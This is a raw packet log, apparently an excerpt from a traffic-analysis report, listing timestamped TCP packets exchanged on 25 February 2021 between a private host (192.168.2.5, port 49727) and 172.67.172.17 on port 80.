Feb 25, 2021 11:05:05.452481031 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452502966 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452524900 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452548981 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452549934 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452568054 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452573061 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452595949 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452616930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452625990 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452639103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452656984 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452661991 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452718019 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452883959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452909946 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452928066 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452950001 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452960014 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452972889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.452987909 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.452996016 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453017950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453038931 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453057051 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453058004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453078985 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453094959 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453099012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453118086 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453121901 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453144073 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453154087 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453166962 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453188896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453210115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453217983 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453232050 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453247070 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453253984 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453274012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453316927 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453882933 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453912020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453933954 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453957081 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.453978062 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.453979969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454000950 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454005003 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454024076 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454029083 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454047918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454066992 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454068899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454091072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454108000 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454112053 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454133034 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454153061 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454160929 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454174042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454185009 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454195976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454220057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454241037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454261065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454262018 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454281092 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454299927 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454328060 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454776049 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454806089 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454827070 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454850912 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454869986 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454874992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454895973 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454914093 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454917908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454937935 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454938889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454960108 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.454976082 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.454982042 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455004930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455029964 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455039978 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455053091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455071926 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455074072 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455095053 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455106974 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455116987 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455137014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455157995 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455157995 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455179930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455200911 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455769062 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455799103 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455821037 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455841064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455858946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455864906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455888033 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455902100 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455910921 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455929041 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455931902 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455950022 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.455955029 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.455979109 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456001997 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456015110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456034899 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456058979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456075907 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456079960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456099033 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456114054 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456120014 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456141949 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456146002 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456162930 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456183910 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456187963 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456245899 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456635952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456665039 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456686020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456711054 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456721067 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456733942 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456753969 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456754923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456775904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456794977 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456796885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456820011 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456837893 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456840992 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456862926 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456887007 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456904888 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456909895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456933022 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456939936 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456955910 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.456973076 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.456979990 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457001925 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457026005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457035065 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.457047939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457084894 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.457587004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457616091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457638979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457659960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457679033 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.457681894 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457705021 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457724094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.457726002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457746983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457767963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457778931 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.457792044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.457817078 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458054066 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458080053 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458101988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458105087 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458125114 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458146095 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458149910 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458168030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458188057 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458190918 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458213091 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458235979 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458244085 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458256960 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458272934 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458277941 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458297968 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458313942 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458316088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458337069 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458355904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458365917 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458379030 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458389997 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458401918 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458420038 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458441019 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.458456993 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.458493948 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459002018 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459031105 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459053040 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459074020 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459093094 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459096909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459119081 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459142923 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459144115 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459165096 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459167004 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459189892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459212065 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459213972 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459233046 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459253073 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459255934 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459276915 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459297895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459306955 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459325075 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459332943 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459347963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459368944 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459392071 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459393024 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459414959 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459435940 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.459923983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459950924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459971905 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.459991932 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460011005 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460020065 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460032940 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460059881 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460059881 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460079908 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460095882 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460100889 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460119963 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460139990 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460140944 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460159063 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460179090 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460181952 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460203886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460223913 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460242033 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460246086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460269928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460278034 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460292101 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460309029 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460314035 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.460371971 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.460988045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461014032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461040974 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461052895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461064100 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461075068 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461097002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461114883 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461117983 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461139917 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461143017 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461163044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461186886 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461210012 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461220026 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461231947 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461253881 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461261988 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461277008 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461297035 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461299896 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461321115 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461323977 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461345911 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461366892 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461366892 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461405993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461415052 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461766958 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461786032 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461807966 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461826086 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461847067 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461848974 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461869955 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461870909 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461891890 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461894989 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461916924 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461935043 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.461937904 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461971998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461990118 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.461992025 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462011099 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462039948 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462049007 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462069988 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462090969 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462093115 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462114096 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462136984 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462138891 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462161064 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462178946 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462182045 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462601900 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462730885 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462755919 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462785006 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462809086 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462810993 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462832928 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462860107 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462881088 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462881088 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462903023 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462903976 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462932110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.462943077 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.462954998 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463013887 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463202000 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463229895 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463253021 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463274002 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463285923 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463296890 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463318110 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463339090 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463340044 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463365078 CET	49727	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:05:05.463367939 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463378906 CET	80	49727	172.67.172.17	192.168.2.5
Feb 25, 2021 11:05:05.463403940 CET	80	49727	172.67.172.17	192.168.2.5
